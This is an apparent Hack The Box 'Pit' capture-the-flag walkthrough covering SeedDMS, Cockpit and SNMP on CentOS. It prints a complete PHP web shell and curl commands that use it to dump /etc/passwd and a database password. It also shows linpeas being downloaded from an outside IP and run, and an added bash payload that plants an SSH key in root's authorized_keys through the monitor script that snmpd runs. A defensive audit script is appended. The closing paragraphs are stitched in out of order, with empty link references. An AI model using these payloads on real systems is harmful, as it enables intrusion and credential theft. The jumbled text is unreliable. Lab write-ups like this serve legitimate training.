<
<!DOCTYPE html>
<html>
...
</html>
* Closing connection 2
And it looks like we can get in: the POST is answered with a 302 to out.ViewFolder.php plus a fresh mydms_session cookie, which indicates the credentials were accepted. The redirect loop that follows is only curl's doing: without -c/-b it never replays the cookie, so the next request is anonymous and bounces back to out.Login.php. Adding -c cookies.txt -b cookies.txt to the command fixes that. (Yes, I truncated the HTML, as we can't do anything with it at the moment.)
We have to upload a document with a backdoor or a reverse shell. For this, we need a place to upload, and it looks like each user has their own folder.
Example of a "backdoor" to upload:
<?php
// Minimal web shell: if a 'cmd' parameter arrives (GET or POST), run it with
// system() and wrap the output in <pre> so it stays readable in a browser.
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}
?>
After many attempts we find that PHP reverse shells do not work well here (firewalld is in the SNMP process list, and the id output below shows the web server confined under SELinux as httpd_t, so outbound connections from it are likely restricted).
This is why we end up using the PHP web shell above for command execution instead. Once it is uploaded, we can reach the file directly under SeedDMS's data directory and pass our OS command as a parameter: http://<host>/seeddms51x/data/1048576/<doc_id>/<filename>.php?cmd=<command>
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -isk -X GET \
--url 'http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id;cat+/etc/passwd' \
-H 'Host: dms-pit.htb' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'X-Requested-With: XMLHttpRequest' \
-b 'mydms_session=7099c4b735b5e2c8ea474bbf0720f90c' --proxy 'http://127.0.0.1:8080'
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Mon, 20 Sep 2021 04:17:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.24
Content-Length: 1601
<pre>uid=992(nginx) gid=988(nginx) groups=988(nginx) context=system_u:system_r:httpd_t:s0
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
unbound:x:997:994:Unbound DNS resolver:/etc/unbound:/sbin/nologin
sssd:x:996:992:User for sssd:/:/sbin/nologin
chrony:x:995:991::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
michelle:x:1000:1000::/home/michelle:/bin/bash
setroubleshoot:x:994:990::/var/lib/setroubleshoot:/sbin/nologin
cockpit-ws:x:993:989:User for cockpit-ws:/nonexisting:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:x:992:988:Nginx web server:/var/lib/nginx:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-wsinstance:x:991:987:User for cockpit-ws instances:/nonexisting:/sbin/nologin
rngd:x:990:986:Random Number Generator Daemon:/var/lib/rngd:/sbin/nologin
</pre>%
Now, let's see what we can do with it. We can use the web shell to read files the nginx user has access to, such as SeedDMS's conf/settings.xml, which holds the application configuration including the database connection details. The path is relative to the directory the web shell sits in:
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -isk -X GET \
--url 'http://dms-pit.htb/seeddms51x/data/1048576/31/1.php?cmd=cat+../../../conf/settings.xml' \
-H 'Host: dms-pit.htb' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'X-Requested-With: XMLHttpRequest' \
-b 'mydms_session=7099c4b735b5e2c8ea474bbf0720f90c' --proxy 'http://127.0.0.1:8080'
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Mon, 20 Sep 2021 04:44:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.24
Content-Length: 11944
<pre><?xml version="1.0" encoding="UTF-8"?>
<configuration>
...
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
</database>
<!-- smtpServer: SMTP Server hostname
- smtpPort: SMTP Server port
- smtpSendFrom: Send from
-->
<smtp smtpServer="localhost" smtpPort="25" smtpSendFrom="seeddms@localhost" smtpUser="" smtpPassword=""/>
</system>
...
</advanced>
<extensions><extension name="example"/></extensions></configuration>
</pre>%
And we did find database credentials, but we cannot test them directly: MySQL only listens on localhost.
What we can do is try the password elsewhere. Re-using it for michelle on the Cockpit login at https://pit.htb:9090/ works, so the database password is also her account password. SSH does not accept it, since the server only allows key authentication, but Cockpit's Accounts page lets each user add their own authorized SSH key (or we could simply use the web terminal Cockpit provides). We add our public key there and log in with the matching private key:
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> ssh michelle@pit.htb -i ~/.ssh/id_rsa
Web console: https://pit.htb:9090/
Last login: Mon Sep 20 00:56:13 2021
[michelle@pit ~]$ id
uid=1000(michelle) gid=1000(michelle) groups=1000(michelle) context=user_u:user_r:user_t:s0
Finally we are in and we got user!
[michelle@pit ~]$ cat user.txt
937041********************db1de1
At the moment, let's remember we have the following credentials: michelle:ied^ieY6xoquu
Let's try to check the system and use linPEAS:
[michelle@pit ~]$ cd /tmp
[michelle@pit tmp]$ which curl
/usr/bin/curl
[michelle@pit tmp]$ curl -sL http://10.10.14.203:8000/linpeas.sh --output linpeas.sh
[michelle@pit tmp]$ ls
linpeas.sh
systemd-private-3902301ae9d84207995016ea767cc5e9-php-fpm.service-lCUtOS
[michelle@pit tmp]$ ./linpeas.sh
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
...
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls
# file: /usr/local/monitoring
USER root rwx
user michelle -wx
GROUP root rwx
mask rwx
other ---
...
After inspecting what linPEAS found, we notice /usr/local/monitoring has an ACL where michelle has only write and execute rights: she can create files in the directory and traverse it, but without read she cannot list what is already there (the Permission denied from ls below is exactly that).
If we recall when we inspected the SNMP dump it gives us something that might be related: .1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: "/usr/bin/monitor"
Let's see what both the monitoring directory and monitor are about:
[michelle@pit tmp]$ ls -ltr /usr/local/monitoring/
ls: cannot open directory '/usr/local/monitoring/': Permission denied
[michelle@pit tmp]$ ls -ltr /usr/bin/monitor
-rwxr--r--. 1 root root 88 Apr 18 2020 /usr/bin/monitor
[michelle@pit tmp]$ file /usr/bin/monitor
/usr/bin/monitor: Bourne-Again shell script, ASCII text executable
[michelle@pit etc]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
So /usr/bin/monitor runs every check*sh script it finds in the monitoring directory, and its mode (-rwxr--r-- root root) means only root can execute it; michelle can merely read it. Thanks to the ACL we can drop a script into the directory, but running monitor ourselves would only execute the script as michelle, which gains nothing. How do we get root to run it? The SNMP extend entry is the answer: snmpd runs /usr/bin/monitor as the 'monitoring' extend command every time that OID is read (run-on-read), and snmpd runs as root on CentOS by default (the root-only SELinux listing in its output confirms it does here), so anything we put in a check*sh file gets executed as root on the next SNMP query.
Let's write a check*sh script that appends our SSH public key to /root/.ssh/authorized_keys, then trigger it by reading the extend OIDs with snmpwalk. To get symbolic names like NET-SNMP-EXTEND-MIB::nsExtendObjects, install snmp-mibs-downloader first and comment out the 'mibs :' line in /etc/snmp/snmp.conf so snmpwalk loads the local MIBs (the 'Cannot find module (MY-MIB)' warning below is harmless, the extend MIB is already loaded). Without MIBs, walking the numeric subtree 1.3.6.1.4.1.8072.1.3.2 does the same job.
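The payload for that step, as an added example that is not part of the original write-up: a function that writes the check*sh script /usr/bin/monitor will pick up, the script body itself (which installs an SSH public key into a target account's authorized_keys and is idempotent, because run-on-read means snmpd re-runs it on every poll), and a local imitation of the monitor loop so the payload can be checked before it is planted. The script name check_key.sh, the key string, and the use of scratch directories in place of /usr/local/monitoring and /root are assumptions for the demo.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up.  Builds and locally tests the
# check*sh payload that /usr/bin/monitor (and therefore snmpd, as root) runs.
# Assumed names: check_key.sh for the payload; scratch directories stand in
# for /usr/local/monitoring and /root in the demo below.

# write_payload DIR PUBKEY TARGET_HOME
# Drops DIR/check_key.sh.  When run, it appends PUBKEY (one OpenSSH public key
# line, assumed to contain no single quotes) to TARGET_HOME/.ssh/authorized_keys,
# creating .ssh with the modes sshd insists on (700 / 600).  The grep guard keeps
# repeated runs from appending the key again: nsExtendRunType is run-on-read, so
# every SNMP poll re-executes the script.  No execute bit is needed because
# monitor passes each file to /bin/bash explicitly.
write_payload() {
  local dir="$1" pubkey="$2" target_home="$3"
  cat > "$dir/check_key.sh" <<EOF
#!/bin/bash
install -d -m 700 "$target_home/.ssh"
touch "$target_home/.ssh/authorized_keys"
chmod 600 "$target_home/.ssh/authorized_keys"
grep -qxF -- '$pubkey' "$target_home/.ssh/authorized_keys" \\
  || printf '%s\\n' '$pubkey' >> "$target_home/.ssh/authorized_keys"
EOF
}

# run_like_monitor DIR
# Mirrors /usr/bin/monitor: every DIR/check*sh is handed to bash in turn.
run_like_monitor() {
  local dir="$1" script
  for script in "$dir"/check*sh; do
    bash "$script"
  done
}

# key_count TARGET_HOME PUBKEY
# Prints how many lines of TARGET_HOME/.ssh/authorized_keys equal PUBKEY.
key_count() {
  local target_home="$1" pubkey="$2"
  grep -cxF -- "$pubkey" "$target_home/.ssh/authorized_keys" 2>/dev/null || true
}

# Demo: ./payload.sh --demo  (uses a temporary directory, touches nothing else)
if [ "${1:-}" = "--demo" ]; then
  tmp=$(mktemp -d)
  mkdir "$tmp/monitoring" "$tmp/root"
  key='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFakeKeyForTestingOnlyFakeKeyForTesting attacker@kali'
  write_payload "$tmp/monitoring" "$key" "$tmp/root"
  run_like_monitor "$tmp/monitoring"
  run_like_monitor "$tmp/monitoring"
  echo "key present $(key_count "$tmp/root" "$key") time(s) after two runs"
  cat "$tmp/root/.ssh/authorized_keys"
  rm -rf "$tmp"
fi
```

On the target the call would be write_payload /usr/local/monitoring "$(cat ~/.ssh/id_ed25519.pub)" /root, followed by one snmpwalk of the extend subtree from the attacking host and then ssh -i ~/.ssh/id_ed25519 root@pit.htb. Because michelle cannot read the directory, check that the file landed with test -f rather than ls.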
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> snmpwalk -m +MY-MIB -v2c -c public pit.htb nsExtendObjects
MIB search path: /home/jxberrios/.snmp/mibs:/usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietf
Cannot find module (MY-MIB): At line 1 in (none)
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."monitoring" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."monitoring" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."monitoring" = STRING: Memory usage
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."monitoring" = STRING: Memory usage
total used free shared buff/cache available
Mem: 3.8Gi 474Mi 3.1Gi 8.0Mi 298Mi 3.2Gi
Swap: 1.9Gi 0B 1.9Gi
Database status
OK - Connection to database successful.
System release info
CentOS Linux release 8.3.2011
SELinux Settings
user
Labeling MLS/ MLS/
SELinux User Prefix MCS Level MCS Range SELinux Roles
guest_u user s0 s0 guest_r
root user s0 s0-s0:c0.c1023 staff_r sysadm_r system_r unconfined_r
staff_u user s0 s0-s0:c0.c1023 staff_r sysadm_r unconfined_r
sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
system_u user s0 s0-s0:c0.c1023 system_r unconfined_r
unconfined_u user s0 s0-s0:c0.c1023 system_r unconfined_r
user_u user s0 s0 user_r
xguest_u user s0 s0 xguest_r
login
Login Name SELinux User MLS/MCS Range Service
__default__ unconfined_u s0-s0:c0.c1023 *
michelle user_u s0 *
root unconfined_u s0-s0:c0.c1023 *
System uptime
22:23:42 up 13 min, 2 users, load average: 1.18, 0.59, 0.33
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."monitoring" = INTEGER: 31
NET-SNMP-EXTEND-MIB::nsExtendResult."monitoring" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".1 = STRING: Memory usage
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".2 = STRING: total used free shared buff/cache available
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".3 = STRING: Mem: 3.8Gi 474Mi 3.1Gi 8.0Mi 298Mi 3.2Gi
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".4 = STRING: Swap: 1.9Gi 0B 1.9Gi
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".5 = STRING: Database status
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".6 = STRING: OK - Connection to database successful.
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".7 = STRING: System release info
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".8 = STRING: CentOS Linux release 8.3.2011
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".9 = STRING: SELinux Settings
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".10 = STRING: user
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".11 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".12 = STRING: Labeling MLS/ MLS/
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".13 = STRING: SELinux User Prefix MCS Level MCS Range SELinux Roles
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".14 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".15 = STRING: guest_u user s0 s0 guest_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".16 = STRING: root user s0 s0-s0:c0.c1023 staff_r sysadm_r system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".17 = STRING: staff_u user s0 s0-s0:c0.c1023 staff_r sysadm_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".18 = STRING: sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".19 = STRING: system_u user s0 s0-s0:c0.c1023 system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".20 = STRING: unconfined_u user s0 s0-s0:c0.c1023 system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".21 = STRING: user_u user s0 s0 user_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".22 = STRING: xguest_u user s0 s0 xguest_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".23 = STRING: login
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".24 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".25 = STRING: Login Name SELinux User MLS/MCS Range Service
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".26 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".27 = STRING: __default__ unconfined_u s0-s0:c0.c1023 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".28 = STRING: michelle user_u s0 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".29 = STRING: root unconfined_u s0-s0:c0.c1023 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".30 = STRING: System uptime
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".31 = STRING: 22:23:42 up 13 min, 2 users, load average: 1.18, 0.59, 0.33
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".31 = No more variables left in this MIB View (It is past the end of the MIB tree)
Now let's try to SSH as root.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> ssh root@pit.htb -i ~/.ssh/id_rsa
Web console: https://pit.htb:9090/
Last login: Mon Jul 26 09:15:10 2021
[root@pit ~]# id; whoami
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
root
AND we are in!! Let's get the flag!
[root@pit ~]# cat root.txt
fb7aeb********************7b53f4
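A defender-side check for the misconfiguration abused above, added here as an example and not part of the original write-up: it parses the `extend` lines of snmpd.conf, reads the script each one launches as root, and flags any directory that script runs files from which a non-root user can write into (via mode bits or a POSIX ACL such as michelle's -wx). The fixture builds a constructed, temp-dir copy of the layout, not the real box.

```python
import os, re, stat, tempfile
from pathlib import Path
PATH_RE = re.compile(r"/[\w./*-]+")  # absolute paths (globs allowed) inside a script

def parse_extend(conf_text):
    """Yield (name, program) for every extend / extend-sh line in snmpd.conf."""
    for line in conf_text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("extend", "extend-sh"):
            continue
        args = parts[2:] if parts[1].startswith(".") else parts[1:]  # drop optional OID
        if len(args) >= 2:
            yield args[0], args[1]

def writable_by_non_root(path):
    """True if others (or a non-root group) may write, or a POSIX ACL adds grants."""
    st = os.stat(path)
    if st.st_mode & stat.S_IWOTH or (st.st_mode & stat.S_IWGRP and st.st_gid != 0):
        return True
    try:  # an access-ACL xattr means extra grants such as michelle's -wx: check getfacl
        return bool(os.getxattr(path, "system.posix_acl_access"))
    except (AttributeError, OSError):  # no ACL, xattrs unsupported, or non-Linux
        return False

def audit(conf_path):
    """Return (extend name, dir, reason) for each directory an extend script runs
    files from that a non-root user could write into."""
    findings = []
    for name, prog in parse_extend(Path(conf_path).read_text()):
        try:
            refs = PATH_RE.findall(Path(prog).read_text())  # paths the script touches
        except (OSError, UnicodeDecodeError):  # missing, unreadable, or a binary
            continue
        for ref in refs:
            d = os.path.dirname(ref) if "*" in ref else ref  # glob => audit its directory
            if os.path.isdir(d) and writable_by_non_root(d):
                findings.append((name, d, "script runs files from a writable directory"))
    return findings

def build_fixture(dir_mode):
    """Constructed Pit-like layout in a temp dir (not the real box); returns conf path."""
    root = tempfile.mkdtemp()
    mon_dir = os.path.join(root, "monitoring")
    os.mkdir(mon_dir)
    os.chmod(mon_dir, dir_mode)  # 0o733 mimics michelle's -wx grant; 0o755 is the fix
    monitor = os.path.join(root, "monitor")
    Path(monitor).write_text("#!/bin/bash\nfor s in %s/check*sh\ndo\n/bin/bash $s\ndone\n" % mon_dir)
    conf = os.path.join(root, "snmpd.conf")
    Path(conf).write_text("rocommunity public\nextend monitoring %s\n" % monitor)
    return conf
```

Running `audit("/etc/snmp/snmpd.conf")` on a real host lists every extend helper directory that someone other than root can drop files into; an empty list is the expected result after tightening the ACL.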
When we browse to , we get what looks to be a default nginx page, version 1.14.1, running on Red Hat! The nginx information was first provided by nmap.
When we go to , not only do we get redirected to an https site, but we also find a CentOS-related login page. From what nmap gave us, you can see the service is http-related but also shows a bad request followed by the use of SSL. If we want to confirm the redirection to https:
While doing some searches on how to pull more data from SNMP, we came across these Perl scripts, which gave us more information (). The following allows us to do a bulk walk on SNMP.
This gives us a lead. If we test this against the domains we know, only responds and redirects us to a login page.
With valid credentials, we can now attempt to use the authenticated RCE exploit available ().
At the moment, we have a confirmed user on the host, 'michelle', and a password in cleartext. We can test whether the password was reused on the database, following the lazy-admin approach, against , as it has the login page found earlier. Since this application is Cockpit, a server administration tool sponsored by Red Hat, we can try these credentials there.
According to , there are ways to abuse SNMP. After looking at the system and what we can do with the user, we can only think of going back to SNMP, since it showed us /usr/bin/monitor.